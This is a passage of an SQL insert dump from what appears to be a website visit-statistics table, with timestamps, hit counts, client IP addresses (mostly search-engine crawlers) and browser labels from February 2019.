'54.36.148.224','other'),(380897,1549103496,1,1,0,0,'46.229.168.130','other'),(380898,1549103638,1,1,0,0,'216.244.66.241','other'),(380899,1549103679,1,1,0,0,'54.36.149.64','other'),(380900,1549103955,1,1,0,0,'66.249.65.196','chrome'),(380901,1549103973,1,1,0,0,'207.46.13.47','other'),(380902,1549104050,1,1,0,0,'66.249.65.198','chrome'),(380903,1549104093,1,1,0,0,'46.229.168.144','other'),(380904,1549104120,1,1,0,0,'54.36.149.60','other'),(380905,1549104273,1,1,0,0,'54.36.148.45','other'),(380906,1549104357,1,1,0,0,'54.36.148.124','other'),(380907,1549104376,1,1,0,0,'66.249.65.194','chrome'),(380908,1549104679,1,1,0,0,'46.229.168.138','other'),(380909,1549104941,2,2,0,0,'66.249.73.30','chrome'),(380910,1549105037,1,1,0,0,'180.76.15.159','other'),(380911,1549105169,1,1,0,0,'54.36.148.34','other'),(380912,1549105463,1,1,0,0,'46.229.168.140','other'),(380913,1549105856,1,1,0,0,'54.36.149.43','other'),(380914,1549105997,1,1,0,0,'54.36.148.68','other'),(380915,1549106023,3,3,0,0,'66.249.65.196','chrome'),(380916,1549106172,2,2,0,0,'66.249.65.194','chrome'),(380917,1549106369,1,1,0,0,'54.36.148.88','other'),(380918,1549106954,1,1,0,0,'54.36.148.21','other'),(380919,1549107012,1,1,0,0,'54.36.148.89','other'),(380920,1549107046,1,1,0,0,'54.36.148.25','other'),(380921,1549107259,1,1,0,0,'54.36.149.38','other'),(380922,1549107779,4,4,0,0,'66.249.65.196','chrome'),(380923,1549107953,1,1,0,0,'46.229.168.138','other'),(380924,1549108012,1,1,0,0,'54.36.149.80','other'),(380925,1549108285,1,1,0,0,'54.36.149.103','other'),(380926,1549108380,1,1,0,0,'8.29.198.25','other'),(380927,1549108387,1,1,0,0,'54.36.148.22','other'),(380928,1549108500,2,2,0,0,'207.46.13.198','other'),(380929,1549108556,1,1,0,0,'54.36.148.225','other'),(380930,1549109107,2,2,0,0,'66.249.73.30','chrome'),(380931,1549109438,1,1,0,0,'54.36.149.92','other'),(380932,1549109496,3,3,0,0,'66.249.65.196','chrome'),(380933,1549109604,1,1,0,0,'66.249.65.194','chrome'),(380934,1549110095,1,1,0,0,'66.249.73.30','chrome'),(380935,1549110431,1,1,0,0,'46.229.168.134','other'),(380936,1549110442,1,1,0,0,'8.29.198.25','other'),(380937,1549111454,3,3,0,0,'66.249.65.196','chrome'),(380938,1549111565,1,1,0,0,'46.229.168.133','other'),(380939,1549112197,1,1,0,0,'54.36.149.77','other'),(380940,1549112238,1,1,0,0,'66.249.73.30','chrome'),(380941,1549112749,1,1,0,0,'54.36.148.214','other'),(380942,1549112774,1,1,0,0,'66.249.73.31','chrome'),(380943,1549113029,1,1,0,0,'54.36.148.152','other'),(380944,1549113135,1,1,0,0,'180.76.15.145','other'),(380945,1549113144,1,1,0,0,'54.36.148.96','other'),(380946,1549113153,1,1,0,0,'54.36.149.53','other'),(380947,1549113216,1,1,0,0,'54.36.148.94','other'),(380948,1549113401,1,1,0,0,'54.36.148.238','other'),(380949,1549113418,1,1,0,0,'54.36.148.183','other'),(380950,1549113768,1,1,0,0,'54.36.148.216','other'),(380951,1549113783,1,1,0,0,'66.249.65.194','chrome'),(380952,1549113815,1,1,0,0,'54.36.148.101','other'),(380953,1549113827,1,1,0,0,'46.229.168.130','other'),(380954,1549113896,1,1,0,0,'54.36.149.37','other'),(380955,1549114214,2,2,0,0,'66.249.65.198','chrome'),(380956,1549114603,1,1,0,0,'216.244.66.241','other'),(380957,1549114668,1,1,0,0,'66.249.73.30','chrome'),(380958,1549115000,3,3,0,0,'66.249.65.196','chrome'),(380959,1549115150,1,1,0,0,'66.249.65.194','chrome'),(380960,1549115647,1,1,0,0,'91.209.11.236','other'),(380961,1549115783,1,1,0,0,'54.36.148.132','other'),(380962,1549115806,1,1,0,0,'54.36.148.76','other'),(380963,1549116106,1,1,0,0,'54.36.148.79','other'),(380964,1549116128,1,1,0,0,'54.36.149.31','other'),(380965,1549116288,1,1,0,0,'66.249.65.194','chrome'),(380966,1549116379,2,2,0,0,'66.249.65.198','chrome'),(380967,1549116425,1,1,0,0,'207.46.13.179','other'),(380968,1549116557,1,1,0,0,'54.36.149.44','other'),(380969,1549117180,3,3,0,0,'66.249.65.196','chrome'),(380970,1549117326,1,1,0,0,'66.249.65.194','chrome'),(380971,1549117421,1,1,0,0,'54.36.148.248','other'),(380972,1549117432,1,1,0,0,'54.36.149.86','other'),(380973,1549117695,1,1,0,0,'54.36.148.163','other'),(380974,1549117847,1,1,0,0,'66.249.73.30','chrome'),(380975,1549118467,1,1,0,0,'66.249.65.198','chrome'),(380976,1549118611,1,1,0,0,'66.249.65.196','chrome'),(380977,1549119060,1,1,0,0,'46.229.168.152','other'),(380978,1549119229,1,1,0,0,'8.29.198.25','other'),(380979,1549119367,1,1,0,0,'40.77.167.1','other'),(380980,1549119387,1,1,0,0,'54.36.148.190','other'),(380981,1549119549,1,1,0,0,'216.244.66.241','other'),(380982,1549119948,1,1,0,0,'54.36.148.131','other'),(380983,1549120081,1,1,0,0,'66.249.65.198','chrome'),(380984,1549120595,1,1,0,0,'46.229.168.133','other'),(380985,1549120728,1,1,0,0,'54.36.148.170','other'),(380986,1549120859,1,1,0,0,'54.36.148.27','other'),(380987,1549121109,1,1,0,0,'66.249.65.194','chrome'),(380988,1549121306,1,1,0,0,'8.29.198.27','other'),(380989,1549122086,1,1,0,0,'5.45.207.79','other'),(380990,1549122503,1,1,0,0,'157.55.39.82','other'),(380991,1549122661,1,1,0,0,'66.249.65.194','chrome'),(380992,1549123548,1,1,0,0,'40.77.167.124','other'),(380993,1549123925,1,1,0,0,'54.36.148.210','other'),(380994,1549124319,1,1,0,0,'54.36.149.38','other'),(380995,1549124790,1,1,0,0,'46.229.168.146','other'),(380996,1549124868,1,1,0,0,'40.77.167.124','other'),(380997,1549124877,1,1,0,0,'66.249.73.30','chrome'),(380998,1549125078,1,1,0,0,'54.36.149.11','other'),(380999,1549125395,1,1,0,0,'216.244.66.241','other'),(381000,1549125914,1,1,0,0,'40.77.167.60','other'),(381001,1549126101,1,1,0,0,'66.249.65.196','chrome'),(381002,1549126606,2,2,0,0,'66.249.65.198','chrome'),(381003,1549126983,1,1,0,0,'54.36.148.197','other'),(381004,1549127212,120,120,0,0,'31.172.136.100','chrome'),(381005,1549127732,2,2,0,0,'66.249.65.196','chrome'),(381006,1549127745,1,1,0,0,'54.36.149.1','other'),(381007,1549127940,1,1,0,0,'66.249.65.198','chrome'),(381008,1549128031,2,2,0,0,'216.244.66.241','other'),(381009,1549128224,1,1,0,0,'46.229.168.153','other'),(381010,1549129298,1,1,0,0,'46.229.168.138','other'),(381011,1549129340,1,1,0,0,'157.55.39.84','other'),(381012,1549129797,1,1,0,0,'66.249.65.196','chrome'),(381013,1549129916,2,2,0,0,'66.249.65.194','chrome'),(381014,1549129958,1,1,0,0,'66.249.73.31','chrome'),(381015,1549130069,1,1,0,0,'8.29.198.27','other'),(381016,1549130227,1,1,0,0,'46.211.126.25','chrome'),(381017,1549130337,1,1,0,0,'66.249.73.1','chrome'),(381018,1549130509,1,1,0,0,'54.36.149.6','other'),(381019,1549130873,1,1,0,0,'178.154.244.11','other'),(381020,1549131192,1,1,0,0,'54.36.149.88','other'),(381021,1549131210,1,1,0,0,'66.249.73.30','chrome'),(381022,1549131623,1,1,0,0,'46.229.168.148','other'),(381023,1549132158,1,1,0,0,'8.29.198.27','other'),(381024,1549132445,1,1,0,0,'13.66.139.0','other'),(381025,1549132470,1,1,0,0,'54.36.149.95','other'),(381026,1549132767,1,1,0,0,'66.249.65.196','chrome'),(381027,1549132777,2,2,0,0,'66.249.65.194','chrome'),(381028,1549132997,1,1,0,0,'199.58.86.209','other'),(381029,1549133209,1,1,0,0,'54.36.149.16','other'),(381030,1549133480,1,1,0,0,'54.36.149.41','other'),(381031,1549133598,1,1,0,0,'40.77.167.60','other'),(381032,1549133756,1,1,0,0,'54.36.148.134','other'),(381033,1549133935,1,1,0,0,'66.249.65.196','chrome'),(381034,1549133967,1,1,0,0,'66.249.65.198','chrome'),(381035,1549133983,1,1,0,0,'66.249.65.194','chrome'),(381036,1549134008,1,1,0,0,'54.36.149.85','other'),(381037,1549134325,1,1,0,0,'54.36.148.139','other'),(381038,1549134407,1,1,0,0,'157.55.39.84','other'),(381039,1549134498,14,14,0,0,'69.30.205.218','other'),(381040,1549134941,1,1,0,0,'46.229.168.134','other'),(381041,1549134976,1,1,0,0,'46.229.168.149','other'),(381042,1549135008,1,1,0,0,'40.77.167.2','other'),(381043,1549135042,1,1,0,0,'46.229.168.138','other'),(381044,1549135104,1,1,0,0,'207.46.13.167','other'),(381045,1549135194,1,1,0,0,'66.249.65.198','chrome'),(381046,1549135228,1,1,0,0,'66.249.65.196','chrome'),(381047,1549135250,3,3,0,0,'46.211.25.117','chrome'),(381048,1549135935,1,1,0,0,'54.36.148.200','other'),(381049,1549136001,1,1,0,0,'46.229.168.145','other'),(381050,1549136462,1,1,0,0,'54.36.148.207','other'),(381051,1549136546,1,1,0,0,'54.36.149.65','other'),(381052,1549137009,1,1,0,0,'54.36.148.61','other'),(381053,1549137279,1,1,0,0,'54.36.149.86','other'),(381054,1549137528,1,1,0,0,'180.76.15.30','other'),(381055,1549137942,1,1,0,0,'157.55.39.84','other'),(381056,1549139737,1,1,0,0,'54.36.148.131','other'),(381057,1549139790,1,1,0,0,'54.36.148.190','other'),(381058,1549139956,1,1,0,0,'54.36.148.66','other'),(381059,1549140120,1,1,0,0,'54.36.149.97','other'),(381060,1549140565,1,1,0,0,'46.229.168.139','other'),(381061,1549140925,1,1,0,0,'8.29.198.27','other'),(381062,1549141198,1,1,0,0,'46.229.168.138','other'),(381063,1549141205,1,1,0,0,'66.249.65.196','chrome'),(381064,1549141314,1,1,0,0,'46.229.168.137','other'),(381065,1549141341,2,2,0,0,'157.55.39.84','other'),(381066,1549141385,1,1,0,0,'54.36.149.22','other'),(381067,1549141776,1,1,0,0,'216.244.66.241','other'),(381068,1549141872,1,1,0,0,'82.145.210.171','other'),(381069,1549141922,2,2,0,0,'207.46.13.35','other'),(381070,1549142246,1,1,0,0,'40.77.167.19','other'),(381071,1549142676,1,1,0,0,'54.36.148.96','other'),(381072,1549142689,1,1,0,0,'157.55.39.220','other'),(381073,1549142692,2,2,0,0,'46.229.168.149','other'),(381074,1549142723,1,1,0,0,'54.36.149.89','other'),(381075,1549142920,1,1,0,0,'54.36.149.92','other'),(381076,1549142921,1,1,0,0,'54.36.148.136','other'),(381077,1549143033,1,1,0,0,'8.29.198.27','other'),(381078,1549143244,1,1,0,0,'54.36.148.143','other'),(381079,1549143655,1,1,0,0,'216.244.66.241','other'),(381080,1549143768,1,1,0,0,'54.36.148.54','other'),(381081,1549144202,1,1,0,0,'46.229.168.142','other'),(381082,1549144760,1,1,0,0,'54.36.148.102','other'),(381083,1549145307,1,1,0,0,'54.36.148.150','other'),(381084,1549145416,1,1,0,0,'54.36.149.23','other'),(381085,1549145981,2,2,0,0,'66.249.65.194','chrome'),(381086,1549146253,1,1,0,0,'54.36.148.74','other'),(381087,1549146390,1,1,0,0,'54.36.148.171','other'),(381088,1549146429,1,1,0,0,'54.36.148.81','other'),(381089,1549146571,1,1,0,0,'109.63.250.63','firefox'),(381090,1549146587,1,1,0,0,'40.77.167.19','other'),(381091,1549147106,1,1,0,0,'54.36.148.237','other'),(381092,1549147113,1,1,0,0,'54.36.148.118','other'),(381093,1549147299,1,1,0,0,'216.244.66.241','other'),(381094,1549147476,1,1,0,0,'46.229.168.130','other'),(381095,1549147910,1,1,0,0,'46.229.168.133','other'),(381096,1549149119,1,1,0,0,'54.36.148.203','other'),(381097,1549149271,1,1,0,0,'54.36.148.80','other'),(381098,1549149417,1,1,0,0,'46.229.168.133','other'),(381099,1549149869,1,1,0,0,'54.36.148.231','other'),(381100,1549149895,1,1,0,0,'54.36.149.77','other'),(381101,1549150322,1,1,0,0,'54.36.148.128','other'),(381102,1549150616,1,1,0,0,'54.36.148.39','other'),(381103,1549150817,1,1,0,0,'5.188.210.53','chrome'),(381104,1549151052,1,1,0,0,'46.229.168.132','other'),(381105,1549151529,1,1,0,0,'54.36.149.88','other'),(381106,1549151698,1,1,0,0,'54.36.148.172','other'),(381107,1549151770,1,1,0,0,'8.29.198.27','other'),(381108,1549152217,1,1,0,0,'54.36.148.128','other'),(381109,1549152552,1,1,0,0,'216.244.66.241','other'),(381110,1549152616,1,1,0,0,'54.36.148.175','other'),(381111,1549152986,1,1,0,0,'157.55.39.74','other'),(381112,1549152996,1,1,0,0,'46.229.168.153','other'),(381113,1549153189,1,1,0,0,'54.36.148.246','other'),(381114,1549153451,1,1,0,0,'5.45.207.79','other'),(381115,1549153547,1,1,0,0,'66.249.65.194','chrome'),(381116,1549153757,1,1,0,0,'54.36.148.26','other'),(381117,1549153834,1,1,0,0,'216.244.66.241','other'),(381118,1549153875,1,1,0,0,'8.29.198.25','other'),(381119,1549153953,1,1,0,0,'207.46.13.153','other'),(381120,1549154032,1,1,0,0,'40.77.167.187','other'),(381121,1549154267,1,1,0,0,'54.36.148.60','other'),(381122,1549154374,1,1,0,0,'46.229.168.140','other'),(381123,1549154423,1,1,0,0,'157.55.39.74','other'),(381124,1549154657,1,1,0,0,'54.36.148.143','other'),(381125,1549154770,1,1,0,0,'54.36.148.20','other'),(381126,1549154929,1,1,0,0,'46.229.168.132','other'),(381127,1549154946,5,5,0,0,'66.249.65.196','chrome'),(381128,1549154978,19,19,0,0,'66.249.65.194','chrome'),(381129,1549155025,1,1,0,0,'66.249.73.1','chrome'),(381130,1549155046,1,1,0,0,'66.249.73.30','chrome'),(381131,1549155207,1,1,0,0,'54.36.148.236','other'),(381132,1549155293,1,1,0,0,'54.36.148.211','other'),(381133,1549155310,1,1,0,0,'85.248.227.163','other'),(381134,1549155361,1,1,0,0,'216.244.66.241','other'),(381135,1549155375,3,3,0,0,'66.249.65.198','chrome'),(381136,1549155854,1,1,0,0,'157.55.39.74','other'),(381137,1549155933,1,1,0,0,'66.249.65.196','chrome'),(381138,1549156139,1,1,0,0,'54.36.149.13','other'),(381139,1549156172,1,1,0,0,'54.36.148.206','other'),(381140,1549156543,1,1,0,0,'54.36.148.184','other'),(381141,1549156646,1,1,0,0,'66.249.73.31','chrome'),(381142,1549156828,1,1,0,0,'207.46.13.176','other'),(381143,1549157436,3,3,0,0,'66.249.65.194','chrome'),(381144,1549157438,2,2,0,0,'66.249.65.196','chrome'),(381145,1549157481,1,1,0,0,'216.244.66.241','other'),(381146,1549158006,1,1,0,0,'157.55.39.74','other'),(381147,1549158066,1,1,0,0,'141.8.142.103','other'),(381148,1549158067,1,1,0,0,'5.45.207.19','other'),(381149,1549158402,1,1,0,0,'54.36.148.167','other'),(381150,1549158737,1,1,0,0,'66.249.65.194','chrome'),(381151,1549159005,1,1,0,0,'54.36.149.37','other'),(381152,1549159134,1,1,0,0,'54.36.149.103','other'),(381153,1549159157,1,1,0,0,'54.36.148.111','other'),(381154,1549159289,2,2,0,0,'157.55.39.220','other'),(381155,1549159361,1,1,0,0,'54.36.149.10','other'),(381156,1549159412,1,1,0,0,'207.46.13.153','other'),(381157,1549159433,1,1,0,0,'157.55.39.74','other'),(381158,1549159877,1,1,0,0,'66.249.65.194','chrome'),(381159,1549160237,1,1,0,0,'66.249.65.196','chrome'),(381160,1549160474,1,1,0,0,'54.36.148.35','other'),(381161,1549160546,1,1,0,0,'54.36.149.32','other'),(381162,1549160956,1,1,0,0,'207.46.13.176','other'),(381163,1549161112,4,4,0,0,'66.249.65.194','chrome'),(381164,1549161550,2,2,0,0,'54.189.84.129','chrome'),(381165,1549161971,1,1,0,0,'66.249.65.196','chrome'),(381166,1549162610,1,1,0,0,'8.29.198.26','other'),(381167,1549162667,1,1,0,0,'66.249.65.194','chrome'),(381168,1549162710,1,1,0,0,'54.36.149.24','other'),(381169,1549162888,2,2,0,0,'66.249.65.198','chrome'),(381170,1549163141,1,1,0,0,'66.249.65.196','chrome'),(381171,1549163709,1,1,0,0,'66.249.73.31','chrome'),(381172,1549163955,1,1,0,0,'54.36.149.81','other'),(381173,1549164090,2,2,0,0,'66.249.65.198','chrome'),(381174,1549164555,1,1,0,0,'54.36.148.186','other'),(381175,1549164602,1,1,0,0,'66.249.65.194','chrome'),(381176,1549164690,1,1,0,0,'54.36.148.182','other'),(381177,1549164723,1,1,0,0,'8.29.198.27','other'),(381178,1549164922,1,1,0,0,'54.36.149.77','other'),(381179,1549165058,1,1,0,0,'3.93.218.58','other'),(381180,1549165657,1,1,0,0,'54.36.149.69','other'),(381181,1549166305,1,1,0,0,'54.36.148.218','other'),(381182,1549166312,1,1,0,0,'66.249.65.196','chrome'),(381183,1549166433,1,1,0,0,'31.184.238.56','chrome'),(381184,1549166572,1,1,0,0,'54.36.148.184','other'),(381185,1549166575,1,1,0,0,'54.36.148.109','other'),(381186,1549166707,1,1,0,0,'39.98.52.133','other'),(381187,1549166939,1,1,0,0,'54.36.148.107','other'),(381188,1549167288,1,1,0,0,'207.46.13.40','other'),(381189,1549167658,2,2,0,0,'66.249.65.198','chrome'),(381190,1549167716,1,1,0,0,'66.249.65.196','chrome'),(381191,1549167761,1,1,0,0,'46.229.168.140','other'),(381192,1549167783,1,1,0,0,'54.36.148.17','other'),(381193,1549167913,2,2,0,0,'66.249.65.194','chrome'),(381194,1549168271,14,14,0,0,'51.38.128.46','other'),(381195,1549168500,1,1,0,0,'54.36.148.89','other'),(381196,1549169031,1,1,0,0,'46.229.168.133','other'),(381197,1549169049,1,1,0,0,'46.229.168.146','other'),(381198,1549169314,2,2,0,0,'66.249.65.198','chrome'),(381199,1549169959,1,1,0,0,'54.36.149.47','other'),(381200,1549170037,3,3,0,0,'66.249.65.196','chrome'),(381201,1549170076,1,1,0,0,'207.46.13.183','other'),(381202,1549170557,1,1,0,0,'54.36.148.158','other'),(381203,1549170651,1,1,0,0,'54.36.148.156','other'),(381204,1549170654,1,1,0,0,'66.249.65.198','chrome'),(381205,1549170955,3,3,0,0,'66.249.65.194','chrome'),(381206,1549171258,1,1,0,0,'54.36.148.41','other'),(381207,1549171327,1,1,0,0,'178.93.7.190','chrome'),(381208,1549171586,2,2,0,0,'216.244.66.241','other'),(381209,1549172264,2,2,0,0,'66.249.65.198','chrome'),(381210,1549172477,1,1,0,0,'54.36.148.255','other'),(381211,1549172490,1,1,0,0,'66.249.73.31','chrome'),(381212,1549172788,1,1,0,0,'54.36.148.204','other'),(381213,1549172816,1,1,0,0,'66.249.65.196','chrome'),(381214,1549172923,1,1,0,0,'54.36.148.247','other'),(381215,1549173467,1,1,0,0,'8.29.198.27','other'),(381216,1549173585,1,1,0,0,'46.229.168.151','other'),(381217,1549173601,1,1,0,0,'54.36.148.161','other'),(381218,1549173796,1,1,0,0,'180.76.15.9','other'),(381219,1549173906,1,1,0,0,'46.229.168.139','other'),(381220,1549174043,1,1,0,0,'54.36.148.224','other'),(381221,1549174243,1,1,0,0,'54.36.149.84','other'),(381222,1549174451,1,1,0,0,'54.36.149.102','other'),(381223,1549174650,1,1,0,0,'54.36.148.79','other'),(381224,1549174788,3,3,0,0,'66.249.65.196','chrome'),(381225,1549174898,1,1,0,0,'84.200.12.61','other'),(381226,1549174908,1,1,0,0,'54.36.148.103','other'),(381227,1549175053,1,1,0,0,'54.36.149.61','other'),(381228,1549175164,3,3,0,0,'66.249.65.198','chrome'),(381229,1549175404,1,1,0,0,'216.244.66.241','other'),(381230,1549175576,1,1,0,0,'8.29.198.25','other'),(381231,1549175714,5,5,0,0,'66.249.65.196','chrome'),(381232,1549175759,2,2,0,0,'66.249.73.30','chrome'),(381233,1549175890,1,1,0,0,'66.249.73.31','chrome'),(381234,1549175918,1,1,0,0,'213.136.88.198','other'),(381235,1549175923,2,2,0,0,'46.229.168.133','other'),(381236,1549175931,2,2,0,0,'66.249.65.194','chrome'),(381237,1549176101,1,1,0,0,'54.36.148.76','other'),(381238,1549176202,1,1,0,0,'66.249.65.198','chrome'),(381239,1549176411,1,1,0,0,'54.36.148.46','other'),(381240,1549176522,1,1,0,0,'157.55.39.29','other'),(381241,1549177085,1,1,0,0,'54.36.149.59','other'),(381242,1549177161,2,2,0,0,'216.244.66.241','other'),(381243,1549177182,1,1,0,0,'66.249.65.196','chrome'),(381244,1549177192,1,1,0,0,'66.249.73.30','chrome'),(381245,1549177277,1,1,0,0,'66.249.65.194','chrome'),(381246,1549177356,1,1,0,0,'54.36.148.208','other'),(381247,1549177363,1,1,0,0,'54.36.148.20','other'),(381248,1549177777,1,1,0,0,'157.55.39.65','other'),(381249,1549178008,1,1,0,0,'66.249.65.198','chrome'),(381250,1549178236,1,1,0,0,'54.36.148.137','other'),(381251,1549178358,1,1,0,0,'54.36.148.140','other'),(381252,1549178539,1,1,0,0,'54.36.148.148','other'),(381253,1549178685,1,1,0,0,'66.249.73.1','chrome'),(381254,1549178795,1,1,0,0,'54.36.148.105','other'),(381255,1549179114,1,1,0,0,'54.36.149.51','other'),(381256,1549179191,1,1,0,0,'66.249.73.31','chrome'),(381257,1549179331,1,1,0,0,'207.46.13.185','other'),(381258,1549179479,1,1,0,0,'54.36.148.128','other'),(381259,1549179749,1,1,0,0,'46.229.168.130','other'),(381260,1549179937,2,2,0,0,'157.55.39.29','other'),(381261,1549180043,3,3,0,0,'66.249.65.196','chrome'),(381262,1549180044,4,4,0,0,'66.249.65.198','chrome'),(381263,1549180184,3,3,0,0,'66.249.65.194','chrome'),(381264,1549180402,1,1,0,0,'162.210.196.100','other'),(381265,1549180416,1,1,0,0,'66.249.73.31','chrome'),(381266,1549180711,1,1,0,0,'54.36.148.189','other'),(381267,1549180890,1,1,0,0,'66.249.73.1','chrome'),(381268,1549180924,1,1,0,0,'54.36.149.29','other'),(381269,1549181182,1,1,0,0,'46.229.168.130','other'),(381270,1549181328,1,0,1,0,'66.249.65.194',''),(381271,1549181574,4,4,0,0,'66.249.65.196','chrome'),(381272,1549181870,1,1,0,0,'46.229.168.129','other'),(381273,1549182426,1,1,0,0,'54.36.148.115','other'),(381274,1549182436,1,1,0,0,'66.249.65.194','chrome'),(381275,1549182563,3,3,0,0,'66.249.65.198','chrome'),(381276,1549182830,1,1,0,0,'54.36.148.186','other'),(381277,1549182847,1,1,0,0,'66.249.73.30','chrome'),(381278,1549182997,1,1,0,0,'66.249.65.196','chrome'),(381279,1549183014,1,1,0,0,'40.77.167.7','other'),(381280,1549183045,1,1,0,0,'66.249.73.1','chrome'),(381281,1549183299,1,1,0,0,'54.36.148.101','other'),(381282,1549183374,1,1,0,0,'66.249.65.194','chrome'),(381283,1549183647,1,1,0,0,'54.36.149.96','other'),(381284,1549183711,1,1,0,0,'46.211.24.143','chrome'),(381285,1549183872,1,1,0,0,'54.36.149.34','other'),(381286,1549184035,1,1,0,0,'54.36.148.91','other'),(381287,1549184107,1,1,0,0,'46.229.168.147','other'),(381288,1549184306,1,1,0,0,'66.249.73.1','chrome'),(381289,1549184310,1,1,0,0,'8.29.198.26','other'),(381290,1549184614,1,1,0,0,'54.36.149.59','other'),(381291,1549184771,1,1,0,0,'54.36.148.215','other'),(381292,1549184991,1,1,0,0,'54.36.149.54','other'),(381293,1549185014,1,1,0,0,'54.36.148.179','other'),(381294,1549185057,1,1,0,0,'66.249.73.31','chrome'),(381295,1549185069,1,1,0,0,'54.36.148.30','other'),(381296,1549185141,2,2,0,0,'66.249.65.198','chrome'),(381297,1549185210,2,2,0,0,'66.249.65.194','chrome'),(381298,1549185494,1,1,0,0,'54.36.148.143','other'),(381299,1549185682,1,1,0,0,'66.249.73.30','chrome'),(381300,1549185928,1,1,0,0,'180.76.15.155','other'),(381301,1549186050,2,2,0,0,'66.249.65.198','chrome'),(381302,1549186206,1,1,0,0,'46.229.168.134','other'),(381303,1549186429,1,1,0,0,'8.29.198.25','other'),(381304,1549186519,1,1,0,0,'5.45.207.19','other'),(381305,1549186736,1,1,0,0,'66.249.65.196','chrome'),(381306,1549186972,1,1,0,0,'37.9.113.148','other'),(381307,1549187001,1,1,0,0,'46.229.168.141','other'),(381308,1549187007,1,1,0,0,'40.77.167.7','other'),(381309,1549187129,2,2,0,0,'216.244.66.241','other'),(381310,1549187175,1,1,0,0,'66.249.73.31','chrome'),(381311,1549187184,1,1,0,0,'66.249.65.194','chrome'),(381312,1549187189,1,1,0,0,'54.36.149.62','other'),(381313,1549187196,1,1,0,0,'46.229.168.136','other'),(381314,1549187569,1,1,0,0,'54.36.148.179','other'),(381315,1549187649,1,1,0,0,'66.249.73.1','chrome'),(381316,1549187748,1,1,0,0,'5.45.207.19','other'),(381317,1549187826,1,1,0,0,'141.8.142.103','other'),(381318,1549188013,1,1,0,0,'46.229.168.145','other'),(381319,1549188090,1,1,0,0,'46.229.168.153','other'),(381320,1549188273,1,1,0,0,'54.36.148.95','other'),(381321,1549188488,1,1,0,0,'178.154.244.11','other'),(381322,1549188681,1,1,0,0,'66.249.73.1','chrome'),(381323,1549188781,1,1,0,0,'95.132.46.180','chrome'),(381324,1549189079,1,1,0,0,'54.36.149.11','other'),(381325,1549189306,1,1,0,0,'54.36.149.87','other'),(381326,1549189365,1,1,0,0,'46.229.168.144','other'),(381327,1549189393,1,1,0,0,'54.36.148.209','other'),(381328,1549189747,1,1,0,0,'54.36.148.17','other'),(381329,1549189842,2,2,0,0,'66.249.65.198','chrome'),(381330,1549189843,2,2,0,0,'157.55.39.29','other'),(381331,1549189931,1,1,0,0,'66.249.73.31','chrome'),(381332,1549190065,1,1,0,0,'66.249.73.1','chrome'),(381333,1549190080,1,1,0,0,'157.55.39.242','other'),(381334,1549190188,1,1,0,0,'66.249.65.194','chrome'),(381335,1549191200,1,1,0,0,'46.229.168.129','other'),(381336,1549191600,1,1,0,0,'66.249.65.194','chrome'),(381337,1549191965,1,1,0,0,'54.36.148.97','other'),(381338,1549192200,1,1,0,0,'157.55.39.29','other'),(381339,1549192309,1,1,0,0,'54.36.148.224','other'),(381340,1549192439,1,1,0,0,'46.229.168.146','other'),(381341,1549192617,1,1,0,0,'54.36.149.61','other'),(381342,1549192756,1,1,0,0,'66.249.65.196','chrome'),(381343,1549193226,1,1,0,0,'54.36.149.100','other'),(381344,1549193249,1,1,0,0,'54.36.148.40','other'),(381345,1549193259,1,1,0,0,'216.244.66.241','other'),(381346,1549193303,1,1,0,0,'207.46.13.7','other'),(381347,1549193371,1,1,0,0,'54.36.148.156','other'),(381348,1549193861,1,1,0,0,'46.229.168.147','other'),(381349,1549193987,1,1,0,0,'46.229.168.130','other'),(381350,1549194321,1,1,0,0,'91.196.178.74','other'),(381351,1549195099,1,1,0,0,'89.163.242.241','opera'),(381352,1549195132,1,1,0,0,'54.36.148.155','other'),(381353,1549195143,1,1,0,0,'8.29.198.27','other'),(381354,1549195360,2,2,0,0,'66.249.65.198','chrome'),(381355,1549195370,1,1,0,0,'46.229.168.134','other'),(381356,1549195549,1,1,0,0,'66.249.65.196','chrome'),(381357,1549195686,1,1,0,0,'54.36.148.248','other'),(381358,1549195900,1,1,0,0,'54.36.148.55','other'),(381359,1549195919,2,2,0,0,'54.36.148.107','other'),(381360,1549197274,1,1,0,0,'8.29.198.26','other'),(381361,1549197756,1,1,0,0,'54.36.149.88','other'),(381362,1549197768,1,1,0,0,'54.36.148.43','other'),(381363,1549198179,1,1,0,0,'46.229.168.139','other'),(381364,1549198446,1,1,0,0,'54.36.148.79','other'),(381365,1549198594,1,1,0,0,'207.46.13.183','other'),(381366,1549198771,1,1,0,0,'54.36.148.20','other'),(381367,1549198891,1,1,0,0,'46.229.168.133','other'),(381368,1549199105,4,4,0,0,'66.249.65.196','chrome'),(381369,1549199337,1,1,0,0,'46.229.168.142','other'),(381370,1549199509,1,1,0,0,'178.154.244.11','other'),(381371,1549199615,1,1,0,0,'54.36.148.80','other'),(381372,1549199851,3,3,0,0,'66.249.65.198','chrome'),(381373,1549199924,1,1,0,0,'141.8.142.103','other'),(381374,1549200074,8,8,0,0,'66.249.65.194','chrome'),(381375,1549200078,5,5,0,0,'66.249.65.196','chrome'),(381376,1549200349,1,1,0,0,'54.36.148.174','other'),(381377,1549200869,1,1,0,0,'66.249.73.31','chrome'),(381378,1549200971,1,1,0,0,'66.249.65.198','chrome'),(381379,1549201051,2,2,0,0,'66.249.65.194','chrome'),(381380,1549201193,1,1,0,0,'54.36.148.42','other'),(381381,1549201285,1,1,0,0,'66.249.73.30','chrome'),(381382,1549201958,1,1,0,0,'66.249.65.198','chrome'),(381383,1549202000,1,1,0,0,'66.249.65.194','chrome'),(381384,1549202004,1,1,0,0,'207.46.13.183','other'),(381385,1549202197,1,1,0,0,'180.76.15.33','other'),(381386,1549202409,1,1,0,0,'54.36.148.163','other'),(381387,1549202471,1,1,0,0,'216.244.66.241','other'),(381388,1549202653,1,1,0,0,'54.36.148.147','other'),(381389,1549202865,1,1,0,0,'54.36.148.171','other'),(381390,1549203346,1,1,0,0,'185.23.167.58','chrome'),(381391,1549203747,1,1,0,0,'54.36.149.102','other'),(381392,1549204013,1,1,0,0,'216.244.66.241','other'),(381393,1549204120,1,1,0,0,'54.36.149.61','other'),(381394,1549204197,1,1,0,0,'180.76.15.34','other'),(381395,1549204345,1,1,0,0,'207.46.13.102','other'),(381396,1549204372,2,2,0,0,'66.249.65.196','chrome'),(381397,1549204407,1,1,0,0,'93.190.138.231','firefox'),(381398,1549204506,1,1,0,0,'207.46.13.183','other'),(381399,1549204607,1,1,0,0,'46.211.115.58','chrome'),(381400,1549204651,1,1,0,0,'66.249.65.198','chrome'),(381401,1549205132,1,1,0,0,'54.36.149.91','other'),(381402,1549205435,1,1,0,0,'54.36.148.95','other'),(381403,1549205469,1,1,0,0